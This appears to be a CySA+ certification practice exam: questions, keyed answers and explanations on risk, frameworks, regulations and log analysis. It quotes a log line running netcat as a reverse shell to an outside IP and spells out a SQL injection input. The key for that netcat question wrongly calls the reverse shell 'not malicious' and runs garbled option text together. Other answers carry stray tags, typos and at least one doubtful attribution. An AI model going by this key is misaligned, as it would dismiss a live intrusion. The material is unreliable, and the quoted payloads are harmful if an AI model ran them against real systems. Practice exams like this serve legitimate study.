CompTIA CySA+ (CS0-003) Practice Exam #3
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered? Red box Black box White box Gray box
Black box In a black box assessment, the penetration tester takes an average hacker's role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.
Jamie's organization is attempting to budget for the next fiscal year. Jamie has calculated that the asset value of a database server is $120,000. Based on her analysis, she believes that a data breach to this server will occur once every four years and has a risk factor is 30%. What is the ALE for a data breach within Jamie's organization? $90,000 $360,000 $9,000 $36,000
$9,000 The single loss expectancy (SLE) is the amount that would be lost in a single occurrence (AV) times the risk factor (RF). The annual loss expectancy (ALE) is the total cost of a risk to an organization annually. This is determined by multiplying the SLE by the annual rate of occurrence (ARO).<br><br>SLE = AV x RF = $120,000 x 0.3 = $36,000<br>ALE = SLE x ARO = $36,000 x 0.25 = $9,000
In the event of a cybersecurity breach, what legal aspects should primarily be considered when communicating with external stakeholders? Internal corporate policy Compliance with data breach notification laws Public relations strategy Contractual obligations with clients or partners
Compliance with data breach notification laws Legal considerations primarily involve complying with local, national, or international data breach notification laws and regulations, which typically require the organization to notify affected parties within a certain timeframe. While internal policies are important, they do not typically carry the legal weight that breach notification laws do. Compliance with these laws should be a primary consideration. While important, contractual obligations are specific to individual relationships and may not have the broad legal implications that breach notification laws do. While managing public relations is a crucial aspect of breach communication, it does not directly involve legal considerations.
An analyst reviews a triple-homed firewall configuration that connects to the internet, a private network, and one other network. Which of the following would best describe the third network connected to this firewall? NIDS DMZ Subnet GPO
DMZ A triple-homed firewall connects to three networks internal (private), external (internet/public), and the demilitarized zone (DMZ). The demilitarized zone (DMZ) network hosts systems that require access from external hosts. Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system looks like and how it behaves for a defined group of users. A network intrusion detection system (NIDS) is a system that attempts to detect hacking activities, denial of service attacks, or port scans on a computer network or a computer itself. A subnet is a logical subdivision of an IP network.
Which of the following is NOT a means of improving data validation and trust? Decrypting data at rest Encrypting data in transit Using MD5 checksums for files Implementing Tripwire
Decrypting data at rest Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
Joseph is interpreting a vulnerability that has a CVSS (v3.1) base score of 8.3. In what risk category would this vulnerability fit? High Low Critical Medium
High CVSS metrics are categorized as critical, high, medium, low, or none based on their numerical score. Vulnerabilities with CVSS base scores rated 9.0 or above are classified as critical. CVSS scores between 7.0 and 8.9 are classified as high. CVSS scores between 4.0 and 6.9 are classified as medium. CVSS scores between 0.1 and 3.9 are classified as low. CVSS scores of 0.0 are classified as none.
Which of the following secure coding best practices ensures a character like < is translated into the < string when writing to an HTML page? Input validation Error handling Output encoding Session management
Output encoding Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the < string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.
What document typically contains high-level statements of management intent? Policy Standard Guideline Procedure
Policy Policies are high-level statements of management intent. Compliance with policies by employees should be mandatory. An information security policy will generally contain broad statements around the various cybersecurity objectives. Procedures describe exactly how to use the standards and guidelines to implement the countermeasures that support the policy. Standards and baselines describe specific products, configurations, or other mechanisms to secure the systems. A guideline is a recommendation that can specify the methodology that is to be used.
What is the primary purpose of the MITRE ATT&CK framework? Describing the linear progression of a cyber attack Providing a knowledge base of tactics, techniques, and procedures used by attackers Testing methodology for web applications Understanding the relationships between the elements of a cyber attack
Providing a knowledge base of tactics, techniques, and procedures used by attackers The MITRE ATT&CK framework provides a detailed matrix of the tactics, techniques, and procedures (TTPs) used by attackers, aiding in understanding and mitigating potential threats. This is a primary focus of the Diamond Model of Intrusion Analysis, not the MITRE ATT&CK framework. This is the focus of the OWASP Testing Guide, not the MITRE ATT&CK framework. This is the main focus of the Cyber Kill Chain, not the MITRE ATT&CK framework.
A buffer overflow vulnerability in Dion Cybertronix Corporation's system was resolved and verified. However, after some weeks, the same vulnerability was identified again. What does this situation demonstrate? Access Control Secure Coding Recurrence Mitigation
Recurrence This situation demonstrates recurrence, as a previously resolved vulnerability has appeared again. The growing complexity of modern systems adds to the challenge, making it harder to identify and address all vulnerabilities. While secure coding aims to prevent vulnerabilities, the reappearance of a vulnerability does not directly relate to it. Access control manages who can access resources in a system. It does not directly relate to the reappearance of a vulnerability. Mitigation reduces the likelihood of the vulnerability being exploited.
Which of the following vulnerabilities is considered a "Top 10" due to its widespread occurrence and potential impact? SolarWinds Supply Chain Attack Google SEO Poisoning Conficker Worm SQL Injection
SQL Injection SQL Injection attacks are pervasive and can have serious consequences, such as allowing an attacker to view, manipulate, or delete data from a database, making this the correct answer. The Conficker worm was a widespread issue when it emerged, but it is not typically categorized as a top 10 vulnerability. While malicious SEO practices can present security concerns, they do not represent a top 10 vulnerability in the same way as SQL Injection. While the SolarWinds supply chain attack was significant, it was a specific, sophisticated attack, not a common, widespread vulnerability like SQL Injection.
You are investigating a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware? Run the Strings tool against each file to identify common malware identifiers Disassemble the files and conduct static analysis on them using IDA Pro Submit the files to an open-source intelligence provider like VirusTotal Scan the files using a local anti-virus/anti-malware engine
Submit the files to an open-source intelligence provider like VirusTotal The best option is to submit them to an open-source intelligence provider like VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs to detect types of malware. It then automatically shares them with the security community, as well. Disassembly and static analysis would require a higher level of knowledge and more time to complete. Running the Strings tool can help identify text if the code is not encoded in a specific way within the malware, but you have to know what you are looking for, such as a malware signature. You should never scan the files using a local anti-virus or anti-malware engine if you suspect the workstation or server has already been compromised because the scanner may also be compromised.
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- sc config schedule start auto net start schedule at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe "" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What BEST describes what is occurring and what action do you recommend to stop it? The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network The host is beaconing to 123.12.34
The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity
You suspect that a system's firmware has been compromised. Which type of firmware would provide resistance against such an attack? Standard Firmware Trusted Firmware UEFI BIOS
Trusted Firmware Trusted Firmware is designed to be resistant to attacks, providing a secure foundation for system boot and operating system load. BIOS (Basic Input/Output System) is a type of firmware used during the booting process, but it's not designed to be resistant to attacks like Trusted Firmware. While UEFI (Unified Extensible Firmware Interface) is a specification for a software interface between an operating system and platform firmware, it does not inherently provide resistance against attacks. Standard Firmware may not include the security features found in Trusted Firmware.
You have been investigating how a malicious actor could exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that a rootkit's installation had modified the web server's BIOS. After removing the rootkit and reflash the BIOS to a known good image, what should you do to prevent the malicious actor from affecting the BIOS again? Utilize secure boot Utilize file integrity monitoring Install an anti-malware application Install a host-based IDS
Utilize secure boot Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that the OS vendor has digitally signed it. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.
What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately? Processor utilization Organizational governance Virtual hosts Log disposition
Virtual hosts Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include physical hosts, thereby missing many network assets.
Based on some old SIEM alerts, you have been asked to perform a forensic analysis on a given host. You have noticed that some SSL network connections are occurring over ports other than port 443. The SIEM alerts indicate that copies of svchost.exe and cmd.exe have been found in the host's %TEMP% folder. The logs indicate that RDP connections have previously connected with an IP address that is external to the corporate intranet, as well. What threat might you have uncovered during your analysis? DDoS APT Ransomware Software vulnerability
APT The provided indicators of compromise appear to be from an Advanced Persistent Threat (APT). These attacks tend to go undetected for several weeks or months and utilize secure communication to external IPs as well as Remote Desktop Protocol connections to provide the attackers with access to the infected host. While an APT might use a software vulnerability to gain their initial access, the full description provided in the question that includes the files being copied and executed from the %TEMP% folder and the use of SSL/RDP connections indicates longer-term exploitation, such as one caused by an APT.
Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability? Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution (Correct) Lack of input validation could allow for a SQL attack Lack of input validation could lead to a cross-site scripting attack
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution When implementing an API, objects in memory from one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may create a fictitious object, appropriately serialize it, and then send it through the API for execution. The only model for defeating this approach is to allow the API to be exposed to trusted sources or to not serialize anything with potentially executable source code (i.e., non-primitive data types). Cross-site scripting and SQL attacks are not a concern for an API first model. While stuffiest logging and monitoring would prevent an analyst from detecting if a deserialization vulnerability was exploited, these alone would not be the basis for an attack against deserialization.
Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state? Ethical hacker Script kiddies Advanced Persistent Threat Hacktivists
Advanced Persistent Threat Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization's information systems. An ethical hacker is also known as a white hat hacker.
While conducting a static analysis source code review of a program, you see the following line of code:String query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + request.getParameter("id") + "'";What is the issue with the largest security issue with this line of code? The * operator will allow retrieval of every data field about this customer in the CUSTOMER table The code is using parameterized queries An SQL injection could occur because input validation is not being used on the id parameter This code is vulnerable to a buffer overflow attack
An SQL injection could occur because input validation is not being used on the id parameter This code takes the input of "id" directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the ID source, it might get replaced with something like' or '1' ='1. This will cause the SQL statement to become: "SELECT * FROM CUSTOMER WHERE CUST_ID='' or '1'='1'". Because '1' always equals '1', the where clause will always return 'true,' meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection.
If a critical software application starts to slow down with each applied security patch, how might this affect vulnerability management? By ensuring seamless integration with other systems in the network By making the application more robust and resistant to crashes By increasing user satisfaction with the application By causing hesitation or delays in applying patches due to the fear of degrading system performance
By causing hesitation or delays in applying patches due to the fear of degrading system performance If patching degrades performance, an organization might hesitate to apply necessary patches, leaving the system vulnerable. System integration and vulnerability management are distinct considerations; performance degradation doesn't improve integration. While robustness is a desirable feature, performance degradation doesn't enhance it and may actually cause hesitations in patching vulnerabilities. Degrading performance is likely to decrease user satisfaction, not increase it, and it may discourage timely vulnerability patching.
In a scenario where an organization has implemented a strict change management policy, how might this policy influence the process of remediating identified vulnerabilities? By reducing the operational costs of the IT department By creating bureaucratic delays in implementing necessary patches and updates By ensuring automatic remediation of vulnerabilities By guaranteeing seamless coordination between different departments
By creating bureaucratic delays in implementing necessary patches and updates If governance policies require multiple approvals for actions, they could slow down the process of remediating vulnerabilities. Governance policies do not ensure automatic remediation; they guide an organization's approach to handling vulnerabilities. While effective governance can improve interdepartmental coordination, it does not inherently expedite vulnerability remediation. While operational cost is a concern in governance, it does not directly impact the speed or efficiency of vulnerability remediation.
Which of the following provides a standard nomenclature for describing security-related software flaws? CVE SOX VPC SIEM
CVE Common Vulnerabilities and Exposures (CVE) is an element of the Security Content Automation Protocol (SCAP) that provides a standard nomenclature for describing security flaws or vulnerabilities. A SIEM is a solution that provides a real-time or near-real-time analysis of security alerts generated by network hardware and applications. A VPC is a private network segment made available to a single cloud consumer on a public cloud. The Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining documents relating to an organization's financial and business operations, including the type of documents stored and their retention periods.
What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software? XCCDF CPE CVE CCE
CVE The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise's computing assets.
Which of the following elements is LEAST likely to be included in an organization's data retention policy? Description of information that needs to be retained Maximum retention period Classification of information Minimum retention period
Classification of information Data retention policies highlight what types of information an organization will maintain and the length of time they will maintain it. Data classification would not be covered in the retention policy but would be a key part of your organization's data classification policy.
What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes? Degauss Destroy Clear Purge
Clear Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.
Fail to Pass Systems has just become the latest victim in a large scale data breach by an APT. Your initial investigation confirms a massive exfiltration of customer data has occurred. Which of the following actions do you recommend to the CEO of Fail to Pass Systems in handling this data breach? Provide a statement to the press that minimizes the scope of the breach Conduct a 'hack-back' of the attacker in order to retrieve the stolen information Purchase a cyber insurance policy, alter the date of the incident in the log files, and file an insurance claim Conduct notification to all affected customers within 72 hours of the discovery of the breach
Conduct notification to all affected customers within 72 hours of the discovery of the breach Generally speaking, most laws require notification within 72 hours, such as the GDPR. All other options are either unethical, constitute insurance fraud, or are illegal. Conducting a hack-back is considered illegal, and once data has been taken, it is nearly impossible to steal it back as the attacker probably has a backup of it. Providing an incorrect statement to the press is unethical, and if your company is caught lying about the extent of the breach, it could further hurt your reputation. Purchasing a cyber insurance policy and altering the log file dates to make it look like the attack occurred after buying the policy would be insurance fraud. This is unethical and illegal.
James, a programmer at Apple Computers, is surfing the internet on his lunch break. He comes across a rumor site focused on providing details of the upcoming iPhone being released in a few months. James knows that Apple likes to keep its product details a secret until it is publicly announced. As James is looking over the website, he sees a blog post with an embedded picture of a PDF containing detailed specifications for the next iPhone and labeled "Proprietary Information - Internal Use Only." The new iPhone is still several months away from release. What should James do next? Contact his team lead and ask what he should do next Contact the service desk or incident response team to determine what to do next Contact the website's owner and request they take down the PDF Reply to the blog post and deny the accuracy of the specifications
Contact the service desk or incident response team to determine what to do next This is an example of either a data leak or a data breach. James is not sure how the website got the details of the product's specifications. Therefore, he should follow his organizational procedures for notification that internal company information has been leaked to the internet. In most organizations, the service desk acts as the single point of contact for all IT issues (even possible data breaches), and they can refer James to the incident response team (if one is currently stood up). Since James works as a programmer, it is unlikely that his team lead is responsible for handling a data leak or data breach, so it is better to contact the service desk first. James should not contact the website directly nor reply to the blog post. Instead, he should leave the response actions to the security team and the incident response team.
Your organization's computer network has been experiencing some unusual activities. You are considering establishing a Computer Security Incident Response Team (CSIRT) to address these incidents. Which of the following would be a primary function of a CSIRT? Creating marketing strategies Exploiting vulnerabilities Writing security policies Coordinating the response to security incidents
Coordinating the response to security incidents A CSIRT's main role is to coordinate the response to computer security incidents, which includes identifying, managing, and preventing further incidents. Creating marketing strategies is outside the scope of a CSIRT's responsibilities, which are focused on computer security. Exploiting vulnerabilities is not a function of a CSIRT. This is a behavior associated with threat actors, not with defensive security teams. While a CSIRT might contribute to the development of security policies based on their incident response experiences, their primary function is to respond to security incidents, not to write policies.
Review the following packet captured at your NIDS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389 Flags [P.], Seq 1834:1245, ack1, win 511, options [nop,nop, TS val 263451334 erc 482862734, length 125 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host? DENY TCP ANY HOST 86.18.10.3 EQ 25 DENY IP HOST 71.168.10.45 ANY EQ 25 DENY IP HOST 86.18.10.3 EQ 3389 DENY TCP ANY HOST 71.168.10.45 EQ 3389
DENY TCP ANY HOST 71.168.10.45 EQ 3389 Since the question asks you to prevent unauthorized service access, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).
You have just run the following commands on your Linux workstation: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DionTraining:~ root# ls Names.txt DionTraining:~ root# more Names.txt DION DIOn Dion dion DionTraining:~ root# grep -i DION Names.txt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY) DION Dion DIOn Dion dion
DION Dion DIOn Dion dion The grep (global search for regular expressions and print) is one of Linux's powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word "DION" will be presented from the file and displayed as the command output. By default, grep uses case sensitivity, so "grep DION Names.txt" would only display the output as "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.
Your organization is concerned about potential leaks of sensitive data. Which technology should be deployed to identify and prevent unauthorized access to such data? Encryption Firewalls DLP Anti-Virus
DLP Data Loss Prevention (DLP) solutions play a crucial role in protecting an organization's sensitive information from unauthorized exposure. By identifying critical data, monitoring how it moves and is used across the network, and preventing unsanctioned access or transmission, DLP tools offer comprehensive protection against data breaches. These technologies can mitigate risks from both internal and external threats, safeguarding data whether it's at rest, in use, or in transit. Anti-virus software primarily focuses on identifying and removing malware and doesn't offer specific protections for sensitive data like DLP. While firewalls can prevent unauthorized network access, they do not specifically identify or protect sensitive data like DLP does. Encryption can secure data in transit or at rest but doesn't actively identify or prevent unauthorized access to sensitive data like DLP.
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? ARP spoofing DNS poisoning MAC spoofing DNS brute forcing
DNS poisoning DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Which of the following types of capabilities would an adversary need to identify and exploit zero-day vulnerabilities? Integrated Acquired and augmented Developed Advanced
Developed According to the MITRE ATT&CK framework, developed capabilities can identify and exploit zero-day vulnerabilities. Acquired and augmented refers to the utilization of commodity malware and techniques (i.e., script kiddies). Advanced capabilities refer to those that can introduce vulnerabilities through the supply chain in proprietary and open-source products. Integrated capabilities involve non-cyber tools such as political or military assets.
You are a security investigator at a high-security installation which houses significant amounts of valuable intellectual property. You are investigating the utilization of George's credentials and are trying to determine if his credentials were compromised or if he is an insider threat. In the break room, you overhear George telling a coworker that he believes he is the target of an ongoing investigation. Which of the following step in the preparation phase of the incident response was likely missed? Creating a call list or escalation list Conduct background screenings on all applicants Developing a proper incident response form Development of a communication plan
Development of a communication plan An established and agreed upon communication plan, which may also include a non-disclosure agreement, should be put in place to prevent the targets of an ongoing insider threat investigations from becoming aware of it. Even if it was later determined that George was innocent, the knowledge that he was being investigated could be damaging to both him and the company. If he was an insider threat who now suspects he is under investigation, he could take steps to cover his tracks or conduct destructive action. While background screenings may prevent some people from becoming insiders, it would not prevent the unauthorized disclosure of information concerning the investigation. A call list/escalation list will help manage this kind of problem and keep the right people informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a proper incident response form may include guidance for communication but would have been orchestrated as part of a larger communications plan that detailed the proper channels to use.
Your incident response team has identified a persistent threat actor who has used a spear-phishing attack to compromise a system in your network. The actor used this system to move laterally within the network, stealing sensitive data. The team wants to understand the relationship between the adversary, the victim system, the phishing infrastructure used by the attacker, and the lateral movement capability. Which framework would best help them in this analysis? MITRE ATT&CK Diamond Model of Intrusion Analysis OWASP Testing Guide Cyber Kill Chain
Diamond Model of Intrusion Analysis The Diamond Model of Intrusion Analysis provides a framework for understanding the four key elements of a cyber attack: the adversary (threat actor), the victim (compromised system), the infrastructure (phishing setup), and the capability (lateral movement). The MITRE ATT&CK framework details tactics, techniques, and procedures used by attackers, but it does not specifically address the relationship between adversary, victim, infrastructure, and capability. The OWASP Testing Guide provides a methodology for testing web application security, not for analyzing a cyber attack's relationships. The Cyber Kill Chain describes the stages of a cyber attack, but it does not specifically analyze the relationships between the adversary, victim, infrastructure, and capability.
Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT? Endpoint behavior analysis Network traffic analysis Endpoint forensics Network forensics
Endpoint forensics An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.
Your organization has detected unusual network traffic patterns originating from an internal server during non-business hours. Upon investigation, it's discovered that an attacker has gained access and is sending data outbound on an uncommon port. According to the MITRE ATT&CK framework, which stage does this activity align with? Discovery Exfiltration Command and Control Lateral Movement
Exfiltration In the MITRE ATT&CK framework, Exfiltration is the stage that describes the transmission of information from within the victim's environment to a location controlled by the adversary. Command and Control pertains to how an adversary communicates with systems under their control within a target network, not the stage of exporting data out of the network. Discovery involves the adversary understanding the network and looking for resources to further their attack, not the act of sending data out of the network. Lateral Movement refers to the techniques an adversary uses to traverse the network, not the act of exfiltrating data.
In the Cyber Kill Chain model, at which stage does an attacker deliver the actual working part of the attack? Weaponization Command and Control Exploitation Reconnaissance
Exploitation The Exploitation phase is where the attacker leverages a vulnerability to execute the main part of the attack. Reconnaissance is the initial phase where the attacker gathers information about the target. Weaponization is where the attacker creates a malicious payload but does not deliver it. The Command and Control phase is where the attacker establishes a channel to remotely control the compromised system.
What regulation protects the privacy of student educational records? GLBA HIPAA SOX FERPA
FERPA Gramm-Leach-Bliley Act (GLBA) institutes requirements that help protect the privacy of an individual's financial information held by financial institutions and others, such as tax preparation companies. The privacy standards and rules created as part of GLBA safeguard private information and set penalties in the event of a violation. Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods. It is relevant for any publicly-traded company with a market value of at least $75 million. The Family Educational Rights and Privacy Act (FERPA) requires that educational institutions implement security and privacy controls for student educational records. The Health Insurance Portability and Accountability Act (HIPAA) establishes several rules and regulations regarding healthcare in the United States. With the rise of electronic medical records, HIPAA standards have been implemented to protect patient medical information privacy through restricted access to medical records and regulations for sharing medical records.
Which law requires government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards? HIPPA COPPA FISMA SOX
FISMA The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or human-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPPA) is a United States federal law designed to provide privacy standards to protect patients' medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children's Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.
Your intrusion detection system has produced an alert based on its review of a series of network packets. After analysis, it is determined that the network packets did not contain any malicious activity. How should you classify this alert? True positive False positive True negative False negative
False positive A false positive occurs when an alert is triggered (the system believes malicious activity occurred) when there is no malicious activity involved. A false positive is an error in some evaluation process in which a condition tested for is mistakenly found to have been detected.
Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? Formal methods of verification Peer review of source code DevSecOps Rigorous user acceptance testing
Formal methods of verification Formal verification methods use a mathematical model of the inputs and outputs of a system to prove that the system works as specified in all cases. Given the level of certainty achieved through formal verification methods, this approach provides the single greatest mitigation against this threat. Formal methods are designed for use in critical software in which corner cases must be eliminated. For example, what should the car do if a child jumps out in front of it, and the only way to avoid the child is to swear off the road (which might kill the driver)? This is a classic corner case that needs to be considered for a self-driving car. User acceptance testing (UAT) is a beta phase of software testing. When the developers have tested the software, it is installed to a limited set of users who follow test schemes and report findings. DevSecOps is a combination of software development, security operations, and systems operations and integrates each discipline with the others. Peer review of source code allows for the review of uncompiled source code by other developers. While DevSecOps, peer review, and user acceptance testing help bring down the system's risk, only a formal method of verification could limit the liability involved with such a critical application as a self-driving car
You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following regulations would have the greatest impact on your bank's cybersecurity program? HIPAA GLBA SOX FERPA
GLBA The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to explain how they share and protect their customers' private information. The Health Insurance Portability and Accountability Act (HIPPA) is a US law designed to provide privacy standards to protect patients' medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all US public company boards, management, and public accounting firms. The Family Educational Rights and Privacy Act (FERPA) of 1974 is a United States federal law that governs the access to educational information and records by public entities such as potential employers, publicly funded educational institutions, and foreign governments.
Which of the following is not considered a component that belongs to the category of identity management infrastructure? Auditing system Human resource system LDAP Provisioning engine
Human resource system The human resource system may be a data source for identity management, but it is not part of the infrastructure itself. LDAP servers, provisioning engines, and auditing systems are all part of identity management infrastructures. Most organizations rely on an LDAP Directory to store users, groups, roles, and relationships between those entities. A provisioning engine is responsible for coordinating the creation of user accounts, email authorizations in the form of rules and roles, and other tasks such as provisioning of physical resources associated with enabling new users. The auditing system is responsible for verifying the identities present in the organization's systems are valid and correct.
An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future? Enable WPA2 security on the open wireless network Install an IDS to protect the HVAC system Enable NAC on the open wireless network Implement a VLAN to separate the HVAC control system from the open wireless network
Implement a VLAN to separate the HVAC control system from the open wireless network A VLAN is useful to segment out network traffic to various parts of the network and stop someone from the open wireless network from logging to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance and determine if it is a 'known' machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent users from accessing all the network features. An IDS would be a good solution to detect the attempted logins, but it won't prevent them. Instead, an IPS would be required to prevent logins.
Your organization has experienced a significant cybersecurity incident, and an executive summary of the incident has been prepared. However, the board of directors has requested detailed evidence supporting the summary. Where would they typically find this information? In the public relations communication In the evidence section of the incident response report In the executive summary In the regulatory reporting
In the evidence section of the incident response report The evidence section typically contains all detailed information, data, and artifacts related to the incident, supporting the claims and conclusions made in the executive summary. The executive summary is meant to provide a high-level overview of the incident, and while it should be accurate, it typically does not include detailed evidence. Regulatory reporting is focused on providing information to regulatory bodies and usually does not include detailed evidence supporting an executive summary. Public relations communications are intended for external stakeholders and are not typically used for providing detailed evidence related to an incident.
